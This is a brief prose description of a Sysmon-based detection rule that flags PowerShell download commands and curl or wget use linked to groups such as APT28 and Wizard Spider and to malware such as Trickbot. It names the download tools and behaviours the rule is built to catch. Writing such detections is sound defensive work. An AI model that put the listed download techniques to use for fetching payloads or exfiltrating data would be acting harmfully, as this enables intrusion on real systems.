This detection rule is designed to monitor and alert on the execution of certain PowerShell commands commonly used by threat actors to download malicious content from the internet. The rule detects typical download commands such as 'Invoke-WebRequest' and 'Invoke-RestMethod', along with traditional command-line tools like 'curl' and 'wget'. The logic of the rule utilizes specific Sysmon event codes to capture related execution events, effectively identifying suspicious behavior that may indicate malicious actions or data exfiltration attempts. The rule references several high-profile threat actor groups known for using these methods, including APT28, FIN13, and Wizard Spider, among others, and lists software commonly associated with these actors, such as Trickbot and Qakbot. This highlights the relevance of the rule in identifying and mitigating potential threats in a Windows environment by leveraging Sysmon logs for effective monitoring.